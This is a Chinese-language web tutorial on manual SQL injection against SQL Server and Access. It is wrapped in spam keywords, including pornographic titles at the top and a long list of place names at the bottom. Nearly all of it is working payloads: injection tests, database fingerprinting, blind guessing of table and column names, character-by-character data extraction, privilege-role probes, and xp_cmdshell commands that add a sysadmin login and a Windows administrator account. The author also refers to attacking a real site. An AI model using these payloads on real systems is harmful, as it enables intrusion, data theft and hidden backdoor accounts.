亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Sql Server 手工注入講解

發布時間:2020-06-17 13:58:59 來源:網絡 閱讀:2527 作者:劉凱峰 欄目:安全技術

1.判斷是否有注入
and 1=1
and 1=2
判斷注入的方法是一樣的

2.初步判斷是否是mssql
and user>0

3.判斷數據庫系統
and (select count(*) from sysobjects)>0 mssql
and (select count(*) from msysobjects)>0 access

4.注入參數是字符
'and [查詢條件] and ''='

5.搜索時沒過濾參數的
'and [查詢條件] and '%25'='

6.猜數表名
and (select Count(*) from [表名])>0
這個比較蛋疼,總共有3oo多個數據庫我手工沒有猜出來,有神器sqlmap跑的都顯示不完,剛才返回錯誤,如果填上正確的表名就行了,下面是猜字段,其實和access數據庫差不懂,學這個就得會舉一反三,這是一些步驟和語句,我給大家自己看吧,主要是這個站比較蛋疼,對了工具的使用會在以后的教程中介紹,學這個要先學會原理,只知道用工具注入也沒有什么意思,要學會原理,有自己的思路,然后自己寫工具才有成就感

7.猜字段
and (select Count(字段名) from 表名)>0

8.猜字段中記錄長度
and (select top 1 len(字段名) from 表名)>0

9.(1)猜字段的ascii值(access)
and (select top 1 asc(mid(字段名,1,1)) from 表名)>0

(2)猜字段的ascii值(mssql)
and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0

10.測試權限結構(mssql)
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
and 1=(select IS_MEMBER('db_owner'));--

11.添加mssql和系統的帳戶
exec master.dbo.sp_addlogin username;--
exec master.dbo.sp_password null,username,password;--
exec master.dbo.sp_addsrvrolemember sysadmin username;--
exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
exec master.dbo.xp_cmdshell 'net user username password /add';--
exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

蒙山县| 五大连池市| 汤原县| 梁河县| 遵义市| 长汀县| 鄯善县| 德安县| 鄂尔多斯市| 七台河市| 台南市| 益阳市| 天气| 林西县| 永修县| 禹城市| 尉氏县| 永安市| 沂南县| 广宁县| 大宁县| 定结县| 潞西市| 尚义县| 温泉县| 蒙自县| 汕尾市| 中西区| 克拉玛依市| 铁岭市| 刚察县| 中超| 盐源县| 恩施市| 汪清县| 德化县| 城口县| 红桥区| 大埔县| 莎车县| 彝良县|